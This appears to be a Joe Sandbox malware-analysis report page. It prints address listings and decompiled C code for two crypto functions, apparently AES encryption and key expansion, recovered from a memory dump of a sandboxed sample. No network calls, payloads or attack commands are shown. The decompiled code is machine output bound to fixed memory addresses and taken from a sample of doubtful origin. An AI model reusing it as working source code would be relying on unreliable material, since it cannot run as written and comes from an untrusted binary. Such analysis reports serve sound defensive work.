                                                                                                                                                            0x009cb4cc
                                                                                                                                                            0x009cb4d2
                                                                                                                                                            0x009cb4d5
                                                                                                                                                            0x009cb4da
                                                                                                                                                            0x009cb4e7
                                                                                                                                                            0x009cb4fd
                                                                                                                                                            0x009cb502
                                                                                                                                                            0x009cb516
                                                                                                                                                            0x009cb51a
                                                                                                                                                            0x009cb520
                                                                                                                                                            0x009cb535
                                                                                                                                                            0x009cb537
                                                                                                                                                            0x009cb53a
                                                                                                                                                            0x009cb553
                                                                                                                                                            0x009cb556
                                                                                                                                                            0x009cb559
                                                                                                                                                            0x009cb55c
                                                                                                                                                            0x009cb55c
                                                                                                                                                            0x009cb562
                                                                                                                                                            0x009cb568
                                                                                                                                                            0x009cb568
                                                                                                                                                            0x009cb56e
                                                                                                                                                            0x009cb56e
                                                                                                                                                            0x009cb574
                                                                                                                                                            0x009cb577
                                                                                                                                                            0x009cb57a
                                                                                                                                                            0x009cb57d
                                                                                                                                                            0x009cb583
                                                                                                                                                            0x009cb583
                                                                                                                                                            0x009cb589
                                                                                                                                                            0x009cb58c
                                                                                                                                                            0x009cb58f
                                                                                                                                                            0x009cb596
                                                                                                                                                            0x009cb59c
                                                                                                                                                            0x009cb5a2
                                                                                                                                                            0x009cb5a5
                                                                                                                                                            0x009cb5ab
                                                                                                                                                            0x009cb5b1
                                                                                                                                                            0x009cb5b6
                                                                                                                                                            0x009cb5c3
                                                                                                                                                            0x009cb5d9
                                                                                                                                                            0x009cb5e1
                                                                                                                                                            0x009cb5fa
                                                                                                                                                            0x009cb5fc
                                                                                                                                                            0x009cb605
                                                                                                                                                            0x009cb61d
                                                                                                                                                            0x009cb61f
                                                                                                                                                            0x009cb628
                                                                                                                                                            0x009cb639
                                                                                                                                                            0x009cb647
                                                                                                                                                            0x009cb64d
                                                                                                                                                            0x009cb653
                                                                                                                                                            0x009cb653
                                                                                                                                                            0x009cb659
                                                                                                                                                            0x009cb659
                                                                                                                                                            0x009cb65f
                                                                                                                                                            0x009cb665
                                                                                                                                                            0x009cb668
                                                                                                                                                            0x009cb66e
                                                                                                                                                            0x009cb66e
                                                                                                                                                            0x009cb674
                                                                                                                                                            0x009cb677
                                                                                                                                                            0x009cb67d
                                                                                                                                                            0x009cb67d
                                                                                                                                                            0x009cb683
                                                                                                                                                            0x009cb686
                                                                                                                                                            0x009cb689
                                                                                                                                                            0x009cb690
                                                                                                                                                            0x009cb696
                                                                                                                                                            0x009cb69c
                                                                                                                                                            0x009cb69f
                                                                                                                                                            0x009cb6a5
                                                                                                                                                            0x009cb6ab
                                                                                                                                                            0x009cb6b3
                                                                                                                                                            0x009cb6c0
                                                                                                                                                            0x009cb6d9
                                                                                                                                                            0x009cb6e1
                                                                                                                                                            0x009cb6fa
                                                                                                                                                            0x009cb6fc
                                                                                                                                                            0x009cb6fe
                                                                                                                                                            0x009cb707
                                                                                                                                                            0x009cb71f
                                                                                                                                                            0x009cb728
                                                                                                                                                            0x009cb741
                                                                                                                                                            0x009cb747
                                                                                                                                                            0x009cb74d
                                                                                                                                                            0x009cb752
                                                                                                                                                            0x009cb754
                                                                                                                                                            0x009cb754
                                                                                                                                                            0x009cb757
                                                                                                                                                            0x009cb75a
                                                                                                                                                            0x009cb75d
                                                                                                                                                            0x009cb760
                                                                                                                                                            0x009cb772

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 83d39c13c2efd6fec92aefe132950f5b0b9b891d7582c5b88d6445412370009b
                                                                                                                                                            • Instruction ID: cb8c801b20ee12fe81e6e5d8007ab0abe3579318d678e0e885b57dfff60831f4
                                                                                                                                                            • Opcode Fuzzy Hash: 83d39c13c2efd6fec92aefe132950f5b0b9b891d7582c5b88d6445412370009b
                                                                                                                                                            • Instruction Fuzzy Hash: 51A2F475A106198FDB48CF69C491AAAF7F2BF8C300F55856ED85AEB741CB34A841CF90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C865D, Relevance: .4, Instructions: 360COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                            			E009C865D(void* __eflags, unsigned int _a4, signed int _a8, signed int _a12, signed int* _a16) {
				unsigned int _v8;
				unsigned int _v12;
				unsigned int _v16;
				unsigned int _v20;
				signed int _t383;
				signed char _t388;
				signed char _t393;
				unsigned int _t394;
				signed int* _t396;
				unsigned int _t413;
				signed int _t420;
				unsigned int _t434;
				unsigned int _t453;
				unsigned int _t499;
				unsigned int _t501;
				unsigned int _t507;
				signed int* _t509;
				signed int* _t511;
				signed int* _t512;
				signed int _t516;
				signed int _t517;
				signed int _t519;
				void* _t521;

				_t521 = __eflags;
				_t396 = _a12;
				asm("rol eax, 0x8");
				asm("ror edx, 0x8");
				_t511 = _a4;
				_a4 = ( *_t396 & 0xff00ff00 |  *_t396 & 0x00ff00ff) ^  *_t511;
				asm("rol eax, 0x8");
				asm("ror edx, 0x8");
				_t6 =  &(_t511[1]); // 0x330475c0
				asm("rol eax, 0x8");
				asm("ror ebx, 0x8");
				_v12 = (_t396[1] & 0xff00ff00 | _t396[1] & 0x00ff00ff) ^  *_t6;
				_t9 =  &(_t511[2]); // 0x560aebc0
				_t388 = (_t396[2] & 0xff00ff00 | _t396[2] & 0x00ff00ff) ^  *_t9;
				asm("rol eax, 0x8");
				asm("ror edx, 0x8");
				_t11 =  &(_t511[3]); // 0xffe7e8e8
				_t499 = (_t396[3] & 0xff00ff00 | _t396[3] & 0x00ff00ff) ^  *_t11;
				_t21 =  &(_t511[4]); // 0x59c033ff
				_v16 =  *(0x9cdb10 + (_t388 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd710 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cd310 + (_a4 >> 0x18) * 4) ^  *(0x9cdf10 + (_t499 & 0x000000ff) * 4) ^  *_t21;
				_t33 =  &(_t511[5]); // 0x8b5e5b40
				_v8 =  *(0x9cdb10 + (_t499 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd710 + (_t388 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cd310 + (_v12 >> 0x18) * 4) ^  *(0x9cdf10 + (_a4 & 0x000000ff) * 4) ^  *_t33;
				_a12 =  *(0x9cd710 + (_t499 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cdb10 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd310 + (_t388 >> 0x18) * 4);
				_t413 = _v12;
				_t516 = _a12 ^  *(0x9cdf10 + (_t413 & 0x000000ff) * 4);
				_a12 = _t516;
				_t48 =  &(_t511[6]); // 0x55c35de5
				_a12 = _t516 ^  *_t48;
				_t60 =  &(_t511[7]); // 0xec83ec8b
				_t420 =  *(0x9cdb10 + (_t413 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd710 + (_a4 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cd310 + (_t499 >> 0x18) * 4) ^  *(0x9cdf10 + (_t388 & 0x000000ff) * 4) ^  *_t60;
				_t512 =  &(_t511[8]);
				_a8 = (_a8 >> 1) - 1;
				while(1) {
					_a4 = _t420;
					if(_t521 == 0) {
						break;
					}
					_t517 = _a12;
					_t501 = _v16;
					_v12 =  *(0x9cdb10 + (_t517 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd710 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cd310 + (_t501 >> 0x18) * 4) ^  *(0x9cdf10 + (_a4 & 0x000000ff) * 4) ^  *_t512;
					_t85 =  &(_t512[1]); // 0x5350d045
					_v20 =  *(0x9cdb10 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd710 + (_t517 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cd310 + (_v8 >> 0x18) * 4) ^  *(0x9cdf10 + (_t501 & 0x000000ff) * 4) ^  *_t85;
					_t434 = _v8;
					_t97 =  &(_t512[2]); // 0x176be8
					_t393 =  *(0x9cd710 + (_a4 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cdb10 + (_t501 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd310 + (_t517 >> 0x18) * 4) ^  *(0x9cdf10 + (_t434 & 0x000000ff) * 4) ^  *_t97;
					_t107 =  &(_t512[3]); // 0x14c48300
					_t507 =  *(0x9cdb10 + (_t434 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd710 + (_t501 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cd310 + (_a4 >> 0x18) * 4) ^  *(0x9cdf10 + (_t517 & 0x000000ff) * 4) ^  *_t107;
					_t118 =  &(_t512[4]); // 0x1374c085
					_v16 =  *(0x9cdb10 + (_t393 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd710 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cd310 + (_v12 >> 0x18) * 4) ^  *(0x9cdf10 + (_t507 & 0x000000ff) * 4) ^  *_t118;
					_t130 =  &(_t512[5]); // 0xff0c75ff
					_v8 =  *(0x9cdb10 + (_t507 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd710 + (_t393 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cd310 + (_v20 >> 0x18) * 4) ^  *(0x9cdf10 + (_v12 & 0x000000ff) * 4) ^  *_t130;
					_a12 =  *(0x9cd710 + (_t507 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cdb10 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd310 + (_t393 >> 0x18) * 4);
					_t453 = _v20;
					_t519 = _a12 ^  *(0x9cdf10 + (_t453 & 0x000000ff) * 4);
					_a12 = _t519;
					_t145 =  &(_t512[6]); // 0xe8530875
					_a12 = _t519 ^  *_t145;
					_t156 =  &(_t512[7]); // 0x1710
					_t420 =  *(0x9cdb10 + (_t453 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd710 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cd310 + (_t507 >> 0x18) * 4) ^  *(0x9cdf10 + (_t393 & 0x000000ff) * 4) ^  *_t156;
					_t512 =  &(_t512[8]);
					_t157 =  &_a8;
					 *_t157 = _a8 - 1;
					__eflags =  *_t157;
				}
				_t394 = _v16;
				_t509 = _a16;
				asm("rol ecx, 0x8");
				asm("ror eax, 0x8");
				 *_t509 = ( *(0x9ce310 + (_v8 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_a12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9ce310 + (_t394 >> 0x18) * 4) & 0xff000000 ^  *(0x9ce310 + (_a4 & 0x000000ff) * 4) & 0x000000ff ^  *_t512) & 0xff00ff00 | ( *(0x9ce310 + (_v8 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_a12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9ce310 + (_t394 >> 0x18) * 4) & 0xff000000 ^  *(0x9ce310 + (_a4 & 0x000000ff) * 4) & 0x000000ff ^  *_t512) & 0x00ff00ff;
				_t184 =  &(_t512[1]); // 0x5350d045
				asm("rol ecx, 0x8");
				asm("ror eax, 0x8");
				_t509[1] = ( *(0x9ce310 + (_a12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_a4 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9ce310 + (_v8 >> 0x18) * 4) & 0xff000000 ^  *(0x9ce310 + (_t394 & 0x000000ff) * 4) & 0x000000ff ^  *_t184) & 0xff00ff00 | ( *(0x9ce310 + (_a12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_a4 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9ce310 + (_v8 >> 0x18) * 4) & 0xff000000 ^  *(0x9ce310 + (_t394 & 0x000000ff) * 4) & 0x000000ff ^  *_t184) & 0x00ff00ff;
				_t197 =  &(_t512[2]); // 0x176be8
				asm("ror eax, 0x8");
				asm("rol ecx, 0x8");
				_t509[2] = ( *(0x9ce310 + (_a4 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_t394 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9ce310 + (_a12 >> 0x18) * 4) & 0xff000000 ^  *(0x9ce310 + (_v8 & 0x000000ff) * 4) & 0x000000ff ^  *_t197) & 0xff00ff00 | ( *(0x9ce310 + (_a4 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_t394 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9ce310 + (_a12 >> 0x18) * 4) & 0xff000000 ^  *(0x9ce310 + (_v8 & 0x000000ff) * 4) & 0x000000ff ^  *_t197) & 0x00ff00ff;
				_t210 =  &(_t512[3]); // 0x14c48300
				asm("rol ecx, 0x8");
				asm("ror eax, 0x8");
				_t383 = ( *(0x9ce310 + (_t394 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_v8 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9ce310 + (_a4 >> 0x18) * 4) & 0xff000000 ^  *(0x9ce310 + (_a12 & 0x000000ff) * 4) & 0x000000ff ^  *_t210) & 0xff00ff00 | ( *(0x9ce310 + (_t394 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_v8 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9ce310 + (_a4 >> 0x18) * 4) & 0xff000000 ^  *(0x9ce310 + (_a12 & 0x000000ff) * 4) & 0x000000ff ^  *_t210) & 0x00ff00ff;
				_t509[3] = _t383;
				return _t383;
			}


























                                                                                                                                                            0x009c865d
                                                                                                                                                            0x009c8663
                                                                                                                                                            0x009c8676
                                                                                                                                                            0x009c867b
                                                                                                                                                            0x009c8686
                                                                                                                                                            0x009c868b
                                                                                                                                                            0x009c8690
                                                                                                                                                            0x009c8695
                                                                                                                                                            0x009c869f
                                                                                                                                                            0x009c86a4
                                                                                                                                                            0x009c86ac
                                                                                                                                                            0x009c86af
                                                                                                                                                            0x009c86b9
                                                                                                                                                            0x009c86b9
                                                                                                                                                            0x009c86be
                                                                                                                                                            0x009c86c6
                                                                                                                                                            0x009c86d8
                                                                                                                                                            0x009c86d8
                                                                                                                                                            0x009c8708
                                                                                                                                                            0x009c870e
                                                                                                                                                            0x009c8746
                                                                                                                                                            0x009c874c
                                                                                                                                                            0x009c8778
                                                                                                                                                            0x009c877b
                                                                                                                                                            0x009c878a
                                                                                                                                                            0x009c8793
                                                                                                                                                            0x009c8796
                                                                                                                                                            0x009c87a0
                                                                                                                                                            0x009c87c7
                                                                                                                                                            0x009c87c7
                                                                                                                                                            0x009c87ca
                                                                                                                                                            0x009c87d2
                                                                                                                                                            0x009c89c8
                                                                                                                                                            0x009c89c8
                                                                                                                                                            0x009c89cb
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c87da
                                                                                                                                                            0x009c87f5
                                                                                                                                                            0x009c8820
                                                                                                                                                            0x009c8853
                                                                                                                                                            0x009c885c
                                                                                                                                                            0x009c8874
                                                                                                                                                            0x009c889a
                                                                                                                                                            0x009c889a
                                                                                                                                                            0x009c88c9
                                                                                                                                                            0x009c88c9
                                                                                                                                                            0x009c8902
                                                                                                                                                            0x009c8908
                                                                                                                                                            0x009c8940
                                                                                                                                                            0x009c8946
                                                                                                                                                            0x009c8972
                                                                                                                                                            0x009c8975
                                                                                                                                                            0x009c8984
                                                                                                                                                            0x009c898d
                                                                                                                                                            0x009c8990
                                                                                                                                                            0x009c899a
                                                                                                                                                            0x009c89be
                                                                                                                                                            0x009c89be
                                                                                                                                                            0x009c89c1
                                                                                                                                                            0x009c89c4
                                                                                                                                                            0x009c89c4
                                                                                                                                                            0x009c89c4
                                                                                                                                                            0x009c89c4
                                                                                                                                                            0x009c89df
                                                                                                                                                            0x009c89e2
                                                                                                                                                            0x009c8a30
                                                                                                                                                            0x009c8a33
                                                                                                                                                            0x009c8a43
                                                                                                                                                            0x009c8a90
                                                                                                                                                            0x009c8a95
                                                                                                                                                            0x009c8a98
                                                                                                                                                            0x009c8aa8
                                                                                                                                                            0x009c8af8
                                                                                                                                                            0x009c8afd
                                                                                                                                                            0x009c8b05
                                                                                                                                                            0x009c8b13
                                                                                                                                                            0x009c8b5e
                                                                                                                                                            0x009c8b63
                                                                                                                                                            0x009c8b66
                                                                                                                                                            0x009c8b75
                                                                                                                                                            0x009c8b78
                                                                                                                                                            0x009c8b7f

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f45a757e62e34622550f62482d82866defcb191e6c1e7684e22934bebfdff9cf
                                                                                                                                                            • Instruction ID: 7c75acd6c3ac910c6adfb3c072a493b9f61248411bc95efee8945c832d159f2e
                                                                                                                                                            • Opcode Fuzzy Hash: f45a757e62e34622550f62482d82866defcb191e6c1e7684e22934bebfdff9cf
                                                                                                                                                            • Instruction Fuzzy Hash: 92E14A71A34159ABCB08CF1DECA1D7A77E0FB49301745492EE542C7396CA39EA21FB90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C8B80, Relevance: .4, Instructions: 350COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 80%
                                                                                                                                                            			E009C8B80(signed int* _a4, signed int* _a8, signed int* _a12) {
				signed int _t164;
				signed int _t180;
				signed int* _t197;
				signed int _t199;
				signed int* _t216;
				signed int _t218;
				signed int* _t222;
				void* _t223;
				signed int _t239;
				signed int _t259;
				signed int _t277;
				signed int _t295;
				signed int* _t298;
				signed int _t317;
				signed int _t320;
				signed int _t324;
				signed int _t331;
				signed int _t333;
				signed int _t335;
				signed int _t338;
				signed int _t345;
				signed int _t347;
				signed int _t350;
				signed int _t354;
				signed char _t357;
				signed int _t365;
				signed int* _t366;
				signed int _t372;
				signed int* _t373;
				signed int* _t374;
				signed int _t381;
				signed int _t388;
				signed int _t395;
				signed int* _t396;
				signed int* _t398;
				signed int* _t399;
				signed int* _t401;
				signed int* _t402;

				_t298 = _a8;
				_t399 = _a4;
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				_t3 =  &(_t399[1]); // 0x9c8148
				_t396 = _t3;
				 *_t399 =  *_t298 & 0xff00ff00 |  *_t298 & 0x00ff00ff;
				asm("ror eax, 0x8");
				asm("rol ecx, 0x8");
				 *_t396 = _t298[1] & 0xff00ff00 | _t298[1] & 0x00ff00ff;
				asm("ror eax, 0x8");
				asm("rol ecx, 0x8");
				_t399[2] = _t298[2] & 0xff00ff00 | _t298[2] & 0x00ff00ff;
				asm("ror edx, 0x8");
				asm("rol eax, 0x8");
				_t354 = _t298[3] & 0xff00ff00 | _t298[3] & 0x00ff00ff;
				_t399[3] = _t354;
				if(_a12 != 0x80) {
					asm("ror eax, 0x8");
					asm("rol ecx, 0x8");
					_t399[4] = _t298[4] & 0xff00ff00 | _t298[4] & 0x00ff00ff;
					asm("ror edx, 0x8");
					asm("rol eax, 0x8");
					_t357 = _t298[5] & 0xff00ff00 | _t298[5] & 0x00ff00ff;
					_t399[5] = _t357;
					if(_a12 != 0xc0) {
						asm("rol ecx, 0x8");
						asm("ror eax, 0x8");
						_t399[6] = _t298[6] & 0xff00ff00 | _t298[6] & 0x00ff00ff;
						asm("ror eax, 0x8");
						asm("rol ecx, 0x8");
						_t164 = _t298[7] & 0xff00ff00 | _t298[7] & 0x00ff00ff;
						_t399[7] = _t164;
						if(_a12 != 0x100) {
							return 0;
						}
						_a8 = 0x9cfb14;
						_t93 =  &(_t399[2]); // 0xc35de58b
						_t365 = ( *(0x9ce310 + (_t164 >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x9ce310 + (_t164 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_t164 >> 0x18) * 4) & 0x000000ff ^  *(0x9ce310 + (_t164 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t399;
						_t180 =  *_t396 ^ _t365;
						_t399[8] = _t365;
						_t399[9] = _t180;
						_t98 =  &(_t399[0xc]); // 0x9c8174
						_t366 = _t98;
						_t317 =  *_t93 ^ _t180;
						_a12 = _t366;
						_t100 =  &(_t399[3]); // 0x83ec8b55
						_t399[0xa] = _t317;
						_t399[0xb] =  *_t100 ^ _t317;
						do {
							_t103 = _t366 - 4; // 0x50e0458d
							_t197 = _a12;
							_t372 =  *(0x9ce310 + ( *_t103 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + ( *_t103 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9ce310 + ( *_t103 >> 0x18) * 4) & 0xff000000 ^  *(0x9ce310 + ( *_t103 & 0x000000ff) * 4) & 0x000000ff ^  *(_t197 - 0x20);
							 *_t197 = _t372;
							_t199 =  *(_t197 - 0x1c) ^ _t372;
							_t373 = _a12;
							 *(_t373 + 4) = _t199;
							_t320 =  *(_t373 - 0x18) ^ _t199;
							 *(_t373 + 8) = _t320;
							 *(_t373 + 0xc) =  *(_t373 - 0x14) ^ _t320;
							_t374 = _t373 + 0x20;
							_a12 = _t374;
							_t216 = _a12;
							_t381 =  *(0x9ce310 + ( *(_t374 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + ( *(_t374 - 0x14) >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x9ce310 + ( *(_t374 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x9ce310 + ( *(_t374 - 0x14) & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t216 - 0x30) ^  *_a8;
							 *(_t216 - 0x10) = _t381;
							_t218 =  *(_t216 - 0x2c) ^ _t381;
							_t366 = _a12;
							 *(_t366 - 0xc) = _t218;
							_t324 =  *(_t366 - 0x28) ^ _t218;
							 *(_t366 - 8) = _t324;
							 *(_t366 - 4) =  *(_t366 - 0x24) ^ _t324;
							_t222 =  &(_a8[1]);
							_a8 = _t222;
						} while (_t222 != 0x9cfb2c);
						_push(0xe);
						L4:
						_pop(_t223);
						return _t223;
					}
					_t331 = ( *(0x9ce310 + (_t357 >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x9ce310 + (_t357 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_t357 >> 0x18) * 4) & 0x000000ff ^  *(0x9ce310 + (_t357 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t399;
					_t398 = 0x9cfb14;
					_t239 =  *_t396 ^ _t331;
					_t399[6] = _t331;
					_t54 =  &(_t399[2]); // 0xc35de58b
					_t333 =  *_t54 ^ _t239;
					_t399[7] = _t239;
					_t56 =  &(_t399[3]); // 0x83ec8b55
					_t399[8] = _t333;
					_t399[9] =  *_t56 ^ _t333;
					_t401 =  &(_t399[0xa]);
					do {
						_t59 = _t401 - 0x18; // 0x75ff29eb
						_t60 = _t401 - 4; // 0xc6efe8a5
						_t335 =  *_t59 ^  *_t60;
						_t61 = _t401 - 0x14; // 0x8df98b10
						 *_t401 = _t335;
						_t401[1] =  *_t61 ^ _t335;
						_t63 =  &(_t401[6]); // 0xf48b89
						_t401 = _t63;
						_t388 =  *(0x9ce310 + ( *(_t401 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + ( *(_t401 - 0x14) >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x9ce310 + ( *(_t401 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x9ce310 + ( *(_t401 - 0x14) & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t401 - 0x28) ^  *_t398;
						_t398 =  &(_t398[1]);
						 *(_t401 - 0x10) = _t388;
						_t259 =  *(_t401 - 0x24) ^ _t388;
						 *(_t401 - 0xc) = _t259;
						_t338 =  *(_t401 - 0x20) ^ _t259;
						 *(_t401 - 8) = _t338;
						 *(_t401 - 4) =  *(_t401 - 0x1c) ^ _t338;
					} while (_t398 != 0x9cfb30);
					_push(0xc);
					goto L4;
				}
				_t345 = ( *(0x9ce310 + (_t354 >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x9ce310 + (_t354 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_t354 >> 0x18) * 4) & 0x000000ff ^  *(0x9ce310 + (_t354 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t399;
				_t277 =  *_t396 ^ _t345;
				_t399[4] = _t345;
				_t19 =  &(_t399[2]); // 0xc35de58b
				_t399[5] = _t277;
				_t347 =  *_t19 ^ _t277;
				_t399[6] = _t347;
				_t399[7] = _t354 ^ _t347;
				_t402 = 0x9cfb14;
				do {
					_t23 =  &(_t396[4]); // 0x120
					_t396 = _t23;
					_t395 =  *(0x9ce310 + (_t396[2] >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_t396[2] >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x9ce310 + (_t396[2] >> 0x18) * 4) & 0x000000ff ^  *(0x9ce310 + (_t396[2] & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t396 - 4) ^  *_t402;
					_t402 =  &(_t402[1]);
					_t396[3] = _t395;
					_t295 =  *_t396 ^ _t395;
					_t396[4] = _t295;
					_t350 = _t396[1] ^ _t295;
					_t396[5] = _t350;
					_t396[6] = _t396[2] ^ _t350;
				} while (_t402 != 0x9cfb38);
				_push(0xa);
				goto L4;
			}









































                                                                                                                                                            0x009c8b84
                                                                                                                                                            0x009c8b8d
                                                                                                                                                            0x009c8b95
                                                                                                                                                            0x009c8b9d
                                                                                                                                                            0x009c8ba2
                                                                                                                                                            0x009c8ba2
                                                                                                                                                            0x009c8ba7
                                                                                                                                                            0x009c8bae
                                                                                                                                                            0x009c8bb3
                                                                                                                                                            0x009c8bbe
                                                                                                                                                            0x009c8bc5
                                                                                                                                                            0x009c8bca
                                                                                                                                                            0x009c8bd5
                                                                                                                                                            0x009c8bdd
                                                                                                                                                            0x009c8be0
                                                                                                                                                            0x009c8bee
                                                                                                                                                            0x009c8bf7
                                                                                                                                                            0x009c8bfa
                                                                                                                                                            0x009c8cf7
                                                                                                                                                            0x009c8cff
                                                                                                                                                            0x009c8d0a
                                                                                                                                                            0x009c8d12
                                                                                                                                                            0x009c8d15
                                                                                                                                                            0x009c8d23
                                                                                                                                                            0x009c8d2c
                                                                                                                                                            0x009c8d2f
                                                                                                                                                            0x009c8e49
                                                                                                                                                            0x009c8e4c
                                                                                                                                                            0x009c8e59
                                                                                                                                                            0x009c8e61
                                                                                                                                                            0x009c8e64
                                                                                                                                                            0x009c8e6f
                                                                                                                                                            0x009c8e78
                                                                                                                                                            0x009c8e7b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c8ffb
                                                                                                                                                            0x009c8e83
                                                                                                                                                            0x009c8ecc
                                                                                                                                                            0x009c8edf
                                                                                                                                                            0x009c8ee6
                                                                                                                                                            0x009c8ee8
                                                                                                                                                            0x009c8eeb
                                                                                                                                                            0x009c8eee
                                                                                                                                                            0x009c8eee
                                                                                                                                                            0x009c8ef1
                                                                                                                                                            0x009c8ef3
                                                                                                                                                            0x009c8ef6
                                                                                                                                                            0x009c8efb
                                                                                                                                                            0x009c8efe
                                                                                                                                                            0x009c8f06
